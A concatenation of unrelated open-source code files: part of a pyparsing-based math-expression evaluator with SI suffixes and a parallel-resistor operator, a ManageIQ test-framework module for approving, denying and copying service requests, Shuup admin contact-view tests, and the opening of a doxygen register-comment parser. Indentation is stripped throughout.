'%': 0.01, 'k': 1e3, 'M': 1e6, 'G': 1e9, 'T': 1e12,
'c': 1e-2, 'm': 1e-3, 'u': 1e-6, 'n': 1e-9, 'p': 1e-12
}
class UndefinedVariable(Exception):
"""
Indicate when a student inputs a variable which was not expected.
"""
pass
def lower_dict(input_dict):
"""
Convert all keys in a dictionary to lowercase; keep their original values.
Keep in mind that it is possible (but not useful?) to define different
variables that have the same lowercase representation. It would be hard to
tell which is used in the final dict and which isn't.
"""
return {k.lower(): v for k, v in input_dict.iteritems()}
# The following few functions define evaluation actions, which are run on lists
# of results from each parse component. They convert the strings and (previously
# calculated) numbers into the number that component represents.
def super_float(text):
"""
Like float, but with SI extensions. 1k goes to 1000.
"""
if text[-1] in SUFFIXES:
return float(text[:-1]) * SUFFIXES[text[-1]]
else:
return float(text)
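For instance, combined with the `SUFFIXES` table (restated here so the snippet is self-contained):

```python
SUFFIXES = {
    '%': 0.01, 'k': 1e3, 'M': 1e6, 'G': 1e9, 'T': 1e12,
    'c': 1e-2, 'm': 1e-3, 'u': 1e-6, 'n': 1e-9, 'p': 1e-12
}

def super_float_sketch(text):
    """float() with SI suffixes: '1k' -> 1000.0."""
    if text[-1] in SUFFIXES:
        return float(text[:-1]) * SUFFIXES[text[-1]]
    return float(text)

assert super_float_sketch('1k') == 1000.0
assert super_float_sketch('4G') == 4000000000.0
assert super_float_sketch('50%') == 0.5
assert super_float_sketch('7.5') == 7.5
```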
def eval_number(parse_result):
"""
Create a float out of its string parts.
e.g. [ '7.13', 'e', '3' ] -> 7130
Calls super_float above.
"""
return super_float("".join(parse_result))
def eval_atom(parse_result):
"""
Return the value wrapped by the atom.
In the case of parenthesis, ignore them.
"""
# Find first number in the list
result = next(k for k in parse_result if isinstance(k, numbers.Number))
return result
def eval_power(parse_result):
"""
Take a list of numbers and exponentiate them, right to left.
e.g. [ 2, 3, 2 ] -> 2^3^2 = 2^(3^2) -> 512
(not to be interpreted (2^3)^2 = 64)
"""
# `reduce` will go from left to right; reverse the list.
parse_result = reversed(
[k for k in parse_result
if isinstance(k, numbers.Number)] # Ignore the '^' marks.
)
# Having reversed it, raise `b` to the power of `a`.
power = reduce(lambda a, b: b ** a, parse_result)
return power
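The right-associative reduction can be checked in isolation — reversing the list before `reduce` and swapping the operands in `b ** a` makes the fold climb the power tower from the top down:

```python
from functools import reduce  # a builtin on Python 2, functools on Python 3

def eval_power_sketch(operands):
    """Right-associative exponentiation: [2, 3, 2] -> 2 ** (3 ** 2)."""
    return reduce(lambda a, b: b ** a, reversed(operands))

assert eval_power_sketch([2, 3, 2]) == 512   # 2 ** 9, not (2 ** 3) ** 2 == 64
assert eval_power_sketch([4, 0.5]) == 2.0    # 4 ** 0.5
```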
def eval_parallel(parse_result):
"""
Compute numbers according to the parallel resistors operator.
BTW it is commutative. Its formula is given by
out = 1 / (1/in1 + 1/in2 + ...)
e.g. [ 1, 2 ] -> 2/3
Return NaN if there is a zero among the inputs.
"""
if len(parse_result) == 1:
return parse_result[0]
if 0 in parse_result:
return float('nan')
reciprocals = [1. / e for e in parse_result
if isinstance(e, numbers.Number)]
return 1. / sum(reciprocals)
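For example, resistors of 1 and 2 in parallel give 2/3, and any zero input yields NaN (the function is restated standalone so the checks can run on their own):

```python
import math

def eval_parallel_sketch(values):
    """out = 1 / (1/in1 + 1/in2 + ...); NaN if any input is zero."""
    if len(values) == 1:
        return values[0]
    if 0 in values:
        return float('nan')
    return 1.0 / sum(1.0 / v for v in values)

assert abs(eval_parallel_sketch([1, 2]) - 2.0 / 3.0) < 1e-12
assert math.isnan(eval_parallel_sketch([5, 0]))
assert eval_parallel_sketch([7]) == 7
```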
def eval_sum(parse_result):
"""
Add the inputs, keeping in mind their sign.
[ 1, '+', 2, '-', 3 ] -> 0
Allow a leading + or -.
"""
total = 0.0
current_op = operator.add
for token in parse_result:
if token == '+':
current_op = operator.add
elif token == '-':
current_op = operator.sub
else:
total = current_op(total, token)
return total
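Tracking the pending operator lets a leading sign work with no special case — a restated sketch with quick checks:

```python
import operator

def eval_sum_sketch(tokens):
    """Signed addition over a token stream: [1, '+', 2, '-', 3] -> 0."""
    total = 0.0
    current_op = operator.add
    for token in tokens:
        if token == '+':
            current_op = operator.add
        elif token == '-':
            current_op = operator.sub
        else:
            total = current_op(total, token)
    return total

assert eval_sum_sketch([1, '+', 2, '-', 3]) == 0.0
assert eval_sum_sketch(['-', 5, '+', 2]) == -3.0
```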
def eval_product(parse_result):
"""
Multiply the inputs.
[ 1, '*', 2, '/', 3 ] -> 0.66
"""
prod = 1.0
current_op = operator.mul
for token in parse_result:
if token == '*':
current_op = operator.mul
elif token == '/':
current_op = operator.truediv
else:
prod = current_op(prod, token)
return prod
def add_defaults(variables, functions, case_sensitive):
"""
Create dictionaries with both the default and user-defined variables.
"""
all_variables = dict(DEFAULT_VARIABLES)
all_functions = dict(DEFAULT_FUNCTIONS)
all_variables.update(variables)
all_functions.update(functions)
if not case_sensitive:
all_variables = lower_dict(all_variables)
all_functions = lower_dict(all_functions)
return (all_variables, all_functions)
def evaluator(variables, functions, math_expr, case_sensitive=False):
"""
Evaluate an expression; that is, take a string of math and return a float.
-Variables are passed as a dictionary from string to value. They must be
python numbers.
-Unary functions are passed as a dictionary from string to function.
"""
# No need to go further.
if math_expr.strip() == "":
return float('nan')
# Parse the tree.
math_interpreter = ParseAugmenter(math_expr, case_sensitive)
math_interpreter.parse_algebra()
# Get our variables together.
all_variables, all_functions = add_defaults(variables, functions, case_sensitive)
# ...and check them
math_interpreter.check_variables(all_variables, all_functions)
# Create a recursion to evaluate the tree.
if case_sensitive:
casify = lambda x: x
else:
casify = lambda x: x.lower() # Lowercase for case insens.
evaluate_actions = {
'number': eval_number,
'variable': lambda x: all_variables[casify(x[0])],
'function': lambda x: all_functions[casify(x[0])](x[1]),
'atom': eval_atom,
'power': eval_power,
'parallel': eval_parallel,
'product': eval_product,
'sum': eval_sum
}
return math_interpreter.reduce_tree(evaluate_actions)
class ParseAugmenter(object):
"""
Holds the data for a particular parse.
Retains the `math_expr` and `case_sensitive` so they needn't be passed
around method to method.
Eventually holds the parse tree and sets of variables as well.
"""
def __init__(self, math_expr, case_sensitive=False):
"""
Create the ParseAugmenter for a given math expression string.
Do the parsing later, when called like `OBJ.parse_algebra()`.
"""
self.case_sensitive = case_sensitive
self.math_expr = math_expr
self.tree = None
self.variables_used = set()
self.functions_used = set()
def vpa(tokens):
"""
When a variable is recognized, store it in `variables_used`.
"""
varname = tokens[0][0]
self.variables_used.add(varname)
def fpa(tokens):
"""
When a function is recognized, store it in `functions_used`.
"""
varname = tokens[0][0]
self.functions_used.add(varname)
self.variable_parse_action = vpa
self.function_parse_action = fpa
def parse_algebra(self):
"""
Parse an algebraic expression into a tree.
Store a `pyparsing.ParseResult` in `self.tree` with proper groupings to
reflect parenthesis and order of operations. Leave all operators in the
tree and do not parse any strings of numbers into their float versions.
Adding the groups and result names makes the `repr()` of the result
really gross. For debugging, use something like
print OBJ.tree.asXML()
"""
# 0.33 or 7 or .34 or 16.
number_part = Word(nums)
inner_number = (number_part + Optional("." + Optional(number_part))) | ("." + number_part)
# pyparsing allows spaces between tokens--`Combine` prevents that.
inner_number = Combine(inner_number)
# SI suffixes and percent.
number_suffix = MatchFirst(Literal(k) for k in SUFFIXES.keys())
# 0.33k or 17
plus_minus = Literal('+') | Literal('-')
number = Group(
Optional(plus_minus) +
inner_number +
Optional(CaselessLiteral("E") + Optional(plus_minus) + number_part) +
Optional(number_suffix)
)
number = number("number")
# Predefine recursive variables.
expr = Forward()
# Handle variables passed in. They must start with letters/underscores
# and may contain numbers afterward.
inner_varname = Word(alphas + "_", alphanums + "_")
varname = Group(inner_varname)("variable")
varname.setParseAction(self.variable_parse_action)
# Same thing for functions.
function = Group(inner_varname + Suppress("(") + expr + Suppress(")"))("function")
function.setParseAction(self.function_parse_action)
atom = number | function | varname | "(" + expr + ")"
atom = Group(atom)("atom")
# Do the following in the correct order to preserve order of operation.
pow_term = atom + ZeroOrMore("^" + atom)
pow_term = Group(pow_term)("power")
par_term = pow_term + ZeroOrMore('||' + pow_term) # 5k || 4k
par_term = Group(par_term)("parallel")
prod_term = par_term + ZeroOrMore((Literal('*') | Literal('/')) + par_term) # 7 * 5 / 4
prod_term = Group(prod_term)("product")
sum_term = Optional(plus_minus) + prod_term + ZeroOrMore(plus_minus + prod_term) # -5 + 4 - 3
sum_term = Group(sum_term)("sum")
# Finish the recursion.
expr << sum_term # pylint: disable=W0104
self.tree = (expr + stringEnd).parseString(self.math_expr)[0]
def reduce_tree(self, handle_actions, terminal_converter=None):
"""
Call `handle_actions` recursively on `self.tree` and return result.
`handle_actions` is a dictionary of node names (e.g. 'product', 'sum',
etc.) to functions. These functions are of the following form:
-input: a list of processed child nodes. If it includes any terminal
nodes in the list, they will be given as their processed forms also.
-output: whatever to be passed to the level higher, and what to
return for the final node.
`terminal_converter` is a function that takes in a token and returns a
processed form. The default of `None` just leaves them as strings.
"""
def handle_node(node):
"""
Return the result representing the node, using recursion.
Call the appropriate `handle_action` for this node. As its inputs,
feed it the output of `handle_node` for each child node.
"""
if not isinstance(node, ParseResults):
# Then treat it as a terminal node.
if terminal_converter is None:
return node
else:
return terminal_converter(node)
node_name = node.getName()
if node_name not in handle_actions: # pragma: no cover
raise Exception(u"Unknown branch name '{}'".format(node_name))
action = handle_actions[node_name]
handled_kids = [handle_node(k) for k in node]
return action(handled_kids)
# Find the value of the entire tree.
return handle_node(self.tree)
def check_variables(self, valid_variables, valid_functions):
"""
Confirm that all the variables used in the tree are valid/defined.
Otherwise, raise an UndefinedVariable containing all bad variables.
"""
if self.case_sensitive:
casify = lambda x: x
else:
casify = lambda x: x.lower() # Lowercase for case insens.
# Test if casify(X) is valid, but return the actual bad input (i.e. X)
bad_vars = set(var for var in self.variables_used
if casify(var) not in valid_variables)
bad_vars.update(func for func in self.functions_used
if casify(func) not in valid_functions)
if bad_vars:
raise UndefinedVariable(' '.join(sorted(bad_vars)))
| agpl-3.0 |
izapolsk/integration_tests | cfme/services/requests.py | 1 | 21136 | from copy import copy
import attr
from navmazing import NavigateToAttribute
from navmazing import NavigateToSibling
from widgetastic.widget import Checkbox
from widgetastic.widget import Table
from widgetastic.widget import Text
from widgetastic.widget import View
from widgetastic_patternfly import BootstrapTreeview
from widgetastic_patternfly import BreadCrumb
from widgetastic_patternfly import Input
from cfme.common import BaseLoggedInPage
from cfme.common.vm_views import BasicProvisionFormView
from cfme.common.vm_views import ProvisionView
from cfme.exceptions import displayed_not_implemented
from cfme.exceptions import ItemNotFound
from cfme.exceptions import RequestException
from cfme.modeling.base import BaseCollection
from cfme.modeling.base import BaseEntity
from cfme.utils.appliance.implementations.ui import CFMENavigateStep
from cfme.utils.appliance.implementations.ui import navigate_to
from cfme.utils.appliance.implementations.ui import navigator
from cfme.utils.log import logger
from cfme.utils.varmeth import variable
from cfme.utils.wait import wait_for
from widgetastic_manageiq import Button
from widgetastic_manageiq import PaginationPane
from widgetastic_manageiq import SummaryForm
from widgetastic_manageiq import SummaryFormItem
from widgetastic_manageiq import WaitTab
@attr.s
class Request(BaseEntity):
"""
Class describes request row from Services - Requests page
"""
REQUEST_FINISHED_STATES = {'Migrated', 'Finished'}
description = attr.ib(default=None)
message = attr.ib(default=None)
partial_check = attr.ib(default=False)
cells = attr.ib(default=None)
row = attr.ib(default=None, init=False)
def __attrs_post_init__(self):
self.cells = self.cells or {'Description': self.description}
# TODO Replace varmeth with Sentaku one day
@variable(alias='rest')
def wait_for_request(self, num_sec=1800, delay=20):
def _finished():
self.rest.reload()
return (self.rest.request_state.title() in self.REQUEST_FINISHED_STATES and
'Retry' not in self.rest.message)
def last_message():
logger.info("Last Request message: '{}'".format(self.rest.message))
wait_for(_finished, num_sec=num_sec, delay=delay, fail_func=last_message,
message="Request finished")
@wait_for_request.variant('ui')
def wait_for_request_ui(self, num_sec=1200, delay=10):
def _finished():
self.update(method='ui')
return (self.row.request_state.text in self.REQUEST_FINISHED_STATES and
'Retry' not in self.row.last_message.text)
def last_message():
logger.info("Last Request message in UI: '{}'".format(self.row.last_message))
wait_for(_finished, num_sec=num_sec, delay=delay, fail_func=last_message,
message="Request finished")
@property
def rest(self):
if self.partial_check:
matching_requests = self.appliance.rest_api.collections.requests.find_by(
description='%{}%'.format(self.cells['Description']))
else:
matching_requests = self.appliance.rest_api.collections.requests.find_by(
description=self.cells['Description'])
if len(matching_requests) > 1:
raise RequestException(
'Multiple requests with matching \"{}\" '
'found - be more specific!'.format(
self.description))
elif len(matching_requests) == 0:
raise ItemNotFound(
'Nothing matching "{}" with partial_check={} was found'.format(
self.cells['Description'], self.partial_check))
else:
return matching_requests[0]
def get_request_row_from_ui(self):
"""Opens CFME UI and return table_row object"""
view = navigate_to(self.parent, 'All')
self.row = view.find_request(self.cells, partial_check=self.partial_check)
return self.row
def get_request_id(self):
return self.rest.request_id
@variable(alias='rest')
def exists(self):
"""If our Request exists in CFME"""
try:
return self.rest.exists
except ItemNotFound:
return False
@property
def status(self):
self.update()
return self.rest.status
@property
def request_state(self):
self.update()
return self.rest.request_state
@exists.variant('ui')
def exists_ui(self):
"""
Checks if Request is shown in CFME UI.
Request might be removed from CFME UI but present in DB
"""
view = navigate_to(self.parent, 'All')
return bool(view.find_request(self.cells, self.partial_check))
@variable(alias='rest')
def update(self):
"""Updates Request object details - last message, status etc
"""
self.rest.reload()
self.description = self.rest.description
self.message = self.rest.message
self.cells = {'Description': self.description}
@update.variant('ui')
def update_ui(self):
view = navigate_to(self.parent, 'All')
view.toolbar.reload.click()
self.row = view.find_request(cells=self.cells, partial_check=self.partial_check)
@variable(alias='rest')
def approve_request(self, reason):
"""Approves the request with the specified reason
Args:
reason: Reason for approving the request.
cancel: Whether to cancel the approval (applies to the UI variant only).
"""
self.rest.action.approve(reason=reason)
@approve_request.variant('ui')
def approve_request_ui(self, reason, cancel=False):
view = navigate_to(self, 'Approve')
view.reason.fill(reason)
if not cancel:
view.submit.click()
else:
view.breadcrumb.click_location(view.breadcrumb.locations[1], handle_alert=True)
view.flash.assert_no_error()
@variable(alias='rest')
def deny_request(self, reason):
"""Opens the specified request and denies it.
Args:
reason: Reason for denying the request.
cancel: Whether to cancel the denial (applies to the UI variant only).
"""
self.rest.action.deny(reason=reason)
@deny_request.variant('ui')
def deny_request_ui(self, reason, cancel=False):
view = navigate_to(self, 'Deny')
view.reason.fill(reason)
if not cancel:
view.submit.click()
else:
view.breadcrumb.click_location(view.breadcrumb.locations[1], handle_alert=True)
view.flash.assert_no_error()
@variable
def remove_request(self, cancel=False):
"""Opens the specified request and deletes it - removes from UI
Args:
cancel: Whether to cancel the deletion.
"""
if self.exists(method="ui"):
view = navigate_to(self, 'Details')
view.toolbar.delete.click(handle_alert=not cancel)
@remove_request.variant("rest")
def remove_request_rest(self):
if "service" in self.rest.request_type:
request = self.appliance.rest_api.collections.service_requests.find_by(id=self.rest.id)
request[0].action.delete()
else:
raise NotImplementedError(
"{} does not support delete operation via REST".format(self.rest.request_type)
)
@variable(alias='rest')
def is_finished(self):
"""Helper function checks if a request is completed
"""
self.update()
return self.rest.request_state.title() in self.REQUEST_FINISHED_STATES
@is_finished.variant('ui')
def is_finished_ui(self):
self.update(method='ui')
return self.row.request_state.text in self.REQUEST_FINISHED_STATES
@variable(alias='rest')
def is_succeeded(self):
return self.is_finished() and self.rest.status.title() == 'Ok'
@is_succeeded.variant('ui')
def is_succeeded_ui(self):
return self.is_finished(method='ui') and self.row.status.text == 'Ok'
def copy_request(self, values=None, cancel=False):
"""Copies the request and edits if needed
"""
view = navigate_to(self, 'Copy')
view.form.fill(values)
if not cancel:
view.form.submit_button.click()
else:
view.cancel_button.click()
view.flash.assert_no_error()
# Requests are identified by description, which is based on vm_name;
# no need to return a Request obj if the name is unchanged => raw request copy
if 'catalog' in values and 'vm_name' in values['catalog']:
return Request(self.parent, description=values['catalog']['vm_name'],
partial_check=True)
def edit_request(self, values, cancel=False):
"""Opens the request for editing and saves or cancels depending on success.
"""
view = navigate_to(self, 'Edit')
if view.form.fill(values):
if not cancel:
view.form.submit_button.click()
# TODO remove this hack for description update that anchors the request
if values.get('Description'):
self.description = values['Description']
self.cells.update({'Description': self.description})
self.update()
else:
view.cancel_button.click()
else:
logger.debug('Nothing was changed in current request')
view.flash.assert_no_error()
@attr.s
class RequestCollection(BaseCollection):
"""The appliance collection of requests"""
ENTITY = Request
class RequestsToolbar(View):
"""Toolbar on the requests view"""
reload = Button(title='Refresh this page')
class RequestBasicView(BaseLoggedInPage):
title = Text('//div[@id="main-content"]//h1')
toolbar = View.nested(RequestsToolbar)
@property
def in_requests(self):
return (
self.logged_in_as_current_user
and self.navigation.currently_selected == ['Services', 'Requests']
)
class RequestsView(RequestBasicView):
table = Table(locator='//div[@id="gtl_div"]//table')
paginator = PaginationPane()
def find_request(self, cells, partial_check=False):
"""Finds the request and returns the row element
Args:
cells: Search data for the requests table.
partial_check: Whether to use the ``__contains`` operator
Returns: row
"""
contains = '' if not partial_check else '__contains'
column_list = self.table.attributized_headers
cells = copy(cells)
for key in cells.keys():
for column_name, column_text in column_list.items():
if key == column_text:
cells['{}{}'.format(column_name, contains)] = cells.pop(key)
break
for _ in self.paginator.pages():
rows = list(self.table.rows(**cells))
if len(rows) == 0:
# row not on this page, assume it has yet to appear
# it might be nice to add an option to fail at this point
continue
elif len(rows) > 1:
raise RequestException('Multiple requests with matching content found - '
'be more specific!')
else:
# found the row!
row = rows[0]
logger.debug(' Request Message: %s', row.last_message.text)
return row
else:
raise Exception("The request specified by {} not found!".format(str(cells)))
@property
def is_displayed(self):
return self.in_requests and self.title.text == 'Requests'
class RequestDetailsToolBar(RequestsView):
copy = Button(title='Copy original Request')
edit = Button(title='Edit the original Request')
delete = Button(title='Delete this Request')
approve = Button(title='Approve this Request')
deny = Button(title='Deny this Request')
class RequestDetailsView(RequestsView):
@View.nested
class details(View): # noqa
request_details = SummaryForm('Request Details')
@View.nested
class request(WaitTab): # noqa
TAB_NAME = 'Request'
email = SummaryFormItem('Request Information', 'E-Mail')
first_name = SummaryFormItem('Request Information', 'First Name')
last_name = SummaryFormItem('Request Information', 'Last Name')
notes = SummaryFormItem('Request Information', 'Notes')
manager_name = SummaryFormItem('Manager', 'Name')
@View.nested
class purpose(WaitTab): # noqa
TAB_NAME = 'Purpose'
apply_tags = BootstrapTreeview('all_tags_treebox')
@View.nested
class catalog(WaitTab): # noqa
TAB_NAME = 'Catalog'
filter_template = SummaryFormItem('Select', 'Filter')
name = SummaryFormItem('Select', 'Name')
provision_type = SummaryFormItem('Select', 'Provision Type')
linked_clone = Checkbox(id='service__linked_clone')
vm_count = SummaryFormItem('Number of VMs', 'Count')
instance_count = SummaryFormItem('Number of Instances', 'Count')
vm_name = SummaryFormItem('Naming', 'VM Name')
instance_name = SummaryFormItem('Naming', 'Instance Name')
vm_description = SummaryFormItem('Naming', 'VM Description')
@View.nested
class environment(WaitTab): # noqa
TAB_NAME = 'Environment'
automatic_placement = Checkbox(name='environment__placement_auto')
# Azure
virtual_private_cloud = SummaryFormItem('Placement - Options', 'Virtual Private Cloud')
cloud_subnet = SummaryFormItem('Placement - Options', 'Cloud Subnet')
security_groups = SummaryFormItem('Placement - Options', 'Security Groups')
resource_groups = SummaryFormItem('Placement - Options', 'Resource Groups')
public_ip_address = SummaryFormItem('Placement - Options', 'Public IP Address ')
# GCE
availability_zone = SummaryFormItem('Placement - Options', 'Availability Zones')
cloud_network = SummaryFormItem('Placement - Options', 'Cloud Network')
# Infra
datacenter = SummaryFormItem('Datacenter', 'Name')
cluster = SummaryFormItem('Cluster', 'Name')
resource_pool = SummaryFormItem('Resource Pool', 'Name')
folder = SummaryFormItem('Folder', 'Name')
host_filter = SummaryFormItem('Host', 'Filter')
host_name = SummaryFormItem('Host', 'Name')
datastore_storage_profile = SummaryFormItem('Datastore', 'Storage Profile')
datastore_filter = SummaryFormItem('Datastore', 'Filter')
datastore_name = SummaryFormItem('Datastore', 'Name')
@View.nested
class hardware(WaitTab): # noqa
num_cpus = SummaryFormItem('Hardware', 'Number of CPUS')
memory = SummaryFormItem('Hardware', 'Startup Memory (MB)')
dynamic_memory = SummaryFormItem('Hardware', 'Dynamic Memory')
vm_limit_cpu = SummaryFormItem('VM Limits', 'CPU (%)')
vm_reserve_cpu = SummaryFormItem('VM Reservations', 'CPU (%)')
@View.nested
class network(WaitTab): # noqa
vlan = SummaryFormItem('Network Adapter Information', 'vLan')
@View.nested
class properties(WaitTab): # noqa
instance_type = SummaryFormItem('Properties', 'Instance Type')
boot_disk_size = SummaryFormItem('Properties', 'Boot Disk Size ')
is_preemptible = Checkbox(name='hardware__is_preemptible')
@View.nested
class customize(WaitTab): # noqa
username = SummaryFormItem('Credentials', 'Username')
ip_mode = SummaryFormItem('IP Address Information', 'Address Mode')
hostname = SummaryFormItem('IP Address Information', 'Host Name')
subnet_mask = SummaryFormItem('IP Address Information', 'Subnet Mask')
gateway = SummaryFormItem('IP Address Information', 'Gateway')
dns_server_list = SummaryFormItem('DNS', 'DNS Server list')
dns_suffix_list = SummaryFormItem('DNS', 'DNS Suffix list')
customize_template = SummaryFormItem('Customize Template', 'Script Name')
@View.nested
class schedule(WaitTab): # noqa
when_provision = SummaryFormItem('Schedule Info', 'When to Provision')
stateless = Checkbox(name='shedule__stateless')
power_on = SummaryFormItem('Lifespan', 'Power on virtual machines after creation')
retirement = SummaryFormItem('Lifespan', 'Time until Retirement')
retirement_warning = SummaryFormItem('Lifespan', 'Retirement Warning')
@property
def is_displayed(self):
expected_description = self.context['object'].rest.description
return (
self.in_requests and
self.breadcrumb.locations[-1] == expected_description and
self.title.text == expected_description
)
breadcrumb = BreadCrumb()
toolbar = RequestDetailsToolBar()
class RequestApprovalView(RequestDetailsView):
reason = Input(name='reason')
submit = Button(title='Submit')
cancel = Button(title="Cancel this provisioning request")
@property
def is_displayed(self):
try:
return (
self.breadcrumb.locations[-1] == 'Request Approval' and
self.breadcrumb.locations[-2] == self.context['object'].rest.description
)
except Exception:
return False
class RequestDenialView(RequestDetailsView):
reason = Input(name='reason')
submit = Button(title='Submit')
cancel = Button(title="Cancel this provisioning request")
@property
def is_displayed(self):
try:
return (
self.breadcrumb.locations[-1] == 'Request Denial' and
self.breadcrumb.locations[-2] == self.context['object'].rest.description
)
except Exception:
return False
class RequestProvisionView(ProvisionView):
@View.nested
class form(BasicProvisionFormView): # noqa
submit_button = Button('Submit') # Submit for 2nd page, tabular form
cancel_button = Button('Cancel')
@property
def is_displayed(self):
try:
return self.breadcrumb.locations[-1] == self.context['object'].rest.description
except Exception:
return False
class RequestEditView(RequestProvisionView):
# BZ 1726741 will impact the breadcrumb items
is_displayed = displayed_not_implemented
# @property
# def is_displayed(self):
# try:
# return (
# self.breadcrumb.locations[-2] == self.context['object'].rest.description and
# self.breadcrumb.locations[-1] == 'Edit VM Provision')
# except Exception:
# return False
class RequestCopyView(RequestProvisionView):
# BZ 1726741 will impact the breadcrumb items
is_displayed = displayed_not_implemented
# @property
# def is_displayed(self):
# try:
# return (
# self.breadcrumb.locations[-2] == self.context['object'].rest.description and
# self.breadcrumb.locations[-1] == 'Copy of VM Provision Request')
# except Exception:
# return False
@navigator.register(RequestCollection, 'All')
class RequestAll(CFMENavigateStep):
VIEW = RequestsView
prerequisite = NavigateToAttribute('appliance.server', 'LoggedIn')
def step(self, *args, **kwargs):
self.prerequisite_view.navigation.select('Services', 'Requests')
@navigator.register(Request, 'Details')
class RequestDetails(CFMENavigateStep):
VIEW = RequestDetailsView
prerequisite = NavigateToAttribute('parent', 'All')
def step(self, *args, **kwargs):
try:
return self.prerequisite_view.table.row(description=self.obj.rest.description).click()
except (NameError, TypeError):
logger.warning('Exception caught, could not match Request')
@navigator.register(Request, 'Edit')
class EditRequest(CFMENavigateStep):
VIEW = RequestEditView
prerequisite = NavigateToSibling('Details')
def step(self, *args, **kwargs):
return self.prerequisite_view.toolbar.edit.click()
@navigator.register(Request, 'Copy')
class CopyRequest(CFMENavigateStep):
VIEW = RequestCopyView
prerequisite = NavigateToSibling('Details')
def step(self, *args, **kwargs):
return self.prerequisite_view.toolbar.copy.click()
@navigator.register(Request, 'Approve')
class ApproveRequest(CFMENavigateStep):
VIEW = RequestApprovalView
prerequisite = NavigateToSibling('Details')
def step(self, *args, **kwargs):
return self.prerequisite_view.toolbar.approve.click()
@navigator.register(Request, 'Deny')
class DenyRequest(CFMENavigateStep):
VIEW = RequestDenialView
prerequisite = NavigateToSibling('Details')
def step(self, *args, **kwargs):
return self.prerequisite_view.toolbar.deny.click()
| gpl-2.0 |
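The `find_request` method above rewrites human-readable column titles into attributized keys and optionally appends widgetastic's `__contains` suffix before filtering table rows. A rough standalone sketch of just that key-rewriting step — `attributize` is a hypothetical stand-in for widgetastic's `attributized_headers` mapping, not the real implementation:

```python
from copy import copy


def attributize(header):
    # Hypothetical stand-in for widgetastic's attributized_headers mapping.
    return header.strip().lower().replace(' ', '_')


def build_row_filter(cells, headers, partial_check=False):
    """Rewrite {'Description': 'foo'} into {'description__contains': 'foo'}."""
    suffix = '__contains' if partial_check else ''
    column_list = {attributize(h): h for h in headers}
    cells = copy(cells)  # don't mutate the caller's search dict
    for key in list(cells):
        for column_name, column_text in column_list.items():
            if key == column_text:
                cells['{}{}'.format(column_name, suffix)] = cells.pop(key)
                break
    return cells
```

The resulting dict is what would then be passed as keyword filters to `table.rows(**cells)`.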
hrayr-artunyan/shuup | shuup_tests/admin/test_contact_extensibility.py | 2 | 3386 | # -*- coding: utf-8 -*-
# This file is part of Shuup.
#
# Copyright (c) 2012-2016, Shoop Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
import pytest
from bs4 import BeautifulSoup
from django.utils.encoding import force_text
from shuup.admin.modules.contacts.views.detail import ContactDetailView
from shuup.admin.modules.contacts.views.edit import ContactEditView
from shuup.apps.provides import override_provides
from shuup.testing.factories import create_random_person, get_default_shop
from shuup.testing.utils import apply_request_middleware
@pytest.mark.django_db
def test_contact_edit_has_custom_toolbar_button(rf, admin_user):
get_default_shop()
contact = create_random_person(locale="en_US", minimum_name_comp_len=5)
request = apply_request_middleware(rf.get("/"), user=admin_user)
view_func = ContactEditView.as_view()
response = view_func(request, pk=contact.pk)
content = force_text(response.render().content)
assert "#mocktoolbarbutton" in content, 'custom toolbar button not found on edit page'
@pytest.mark.django_db
def test_contact_detail_has_custom_toolbar_button(rf, admin_user):
get_default_shop()
contact = create_random_person(locale="en_US", minimum_name_comp_len=5)
request = apply_request_middleware(rf.get("/"), user=admin_user)
view_func = ContactDetailView.as_view()
response = view_func(request, pk=contact.pk)
content = force_text(response.render().content)
assert "#mocktoolbarbutton" in content, 'custom toolbar button not found on detail page'
@pytest.mark.django_db
def test_contact_detail_has_custom_section(rf, admin_user):
get_default_shop()
contact = create_random_person(locale="en_US", minimum_name_comp_len=5)
request = apply_request_middleware(rf.get("/"), user=admin_user)
view_func = ContactDetailView.as_view()
response = view_func(request, pk=contact.pk)
content = force_text(response.render().content)
assert "mock section title" in content, 'custom section title not found on detail page'
assert "mock section content" in content, 'custom section content not found on detail page'
assert "mock section context data" in content, 'custom section context data not found on detail page'
@pytest.mark.django_db
def test_contact_detail_has_mocked_toolbar_action_items(rf, admin_user):
get_default_shop()
contact = create_random_person(locale="en_US", minimum_name_comp_len=5)
request = apply_request_middleware(rf.get("/"), user=admin_user)
view_func = ContactDetailView.as_view()
with override_provides("admin_contact_toolbar_action_item", [
"shuup.testing.admin_module.toolbar:MockContactToolbarActionItem"
]):
assert _check_if_mock_action_item_exists(view_func, request, contact)
with override_provides("admin_contact_toolbar_action_item", []):
assert not _check_if_mock_action_item_exists(view_func, request, contact)
def _check_if_mock_action_item_exists(view_func, request, contact):
response = view_func(request, pk=contact.pk)
soup = BeautifulSoup(response.render().content)
for dropdown_link in soup.find_all("a", {"class": "btn-default"}):
if dropdown_link.get("href", "") == "/#mocktoolbaractionitem":
return True
return False
| agpl-3.0 |
hoangt/core | core/waf/docs/register.py | 3 | 4651 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from collections import OrderedDict
from error_handler import ReportError
from doxycomment import ExtractCommentBlocks,\
IsCommentBlockStart, IsCommentBlockEnd,\
IsInCommentBlock, GetCommentBlock,\
SplitLine, BlockHandler
def ProcessRegister(lineArray, registerPosition, CommentBlocks):
startreg_ex = re.compile("^(?P<start>\W*(\*|///)?\W*)(@|\\|/)register (?P<id>\w+)(\W*(?P<title>.*))$")
bits_ex = re.compile("^(?P<start>\W*(\*|///)?\W*)\[(?P<bit>\d+)(:(?P<endbit>\d+))?\]\W*\((?P<name>[^)]+)\)(?P<desc>.*)$")
bitfollow_ex = re.compile("^(?P<start>\W*(\*|///)?\W*)(?P<desc>.*)$")
endreg_ex = re.compile("^(?P<start>\W*(\*|///)?\W*)(@|\\|/)endregister\W*$")
class Proxy(object):
def __call__(self, res):
self.__res = res
return res
def __getattr__(self, name):
return getattr(self.__res,name)
class Empty(object):
pass
lines = []
curr = None
field = None
res = Proxy()
for lineNumber in range(registerPosition["Start"], registerPosition["End"]+1):
line = lineArray[lineNumber]
if not curr:
if res(startreg_ex.match(line)):
curr = Empty()
curr.id = res.group('id')
curr.title = res.group('title')
curr.start = res.group('start')
curr.bits = []
else:
lines.append(line)
else:
if res(bits_ex.match(line)):
field = Empty()
field.bit = int(res.group('bit'))
field.endbit = res.group('endbit')
field.name = res.group('name')
field.desc = res.group('desc').strip() + ' '
curr.bits.append(field)
elif res(endreg_ex.match(line)):
start = curr.start
ordered = sorted(curr.bits, key=lambda field: field.bit, reverse=True)
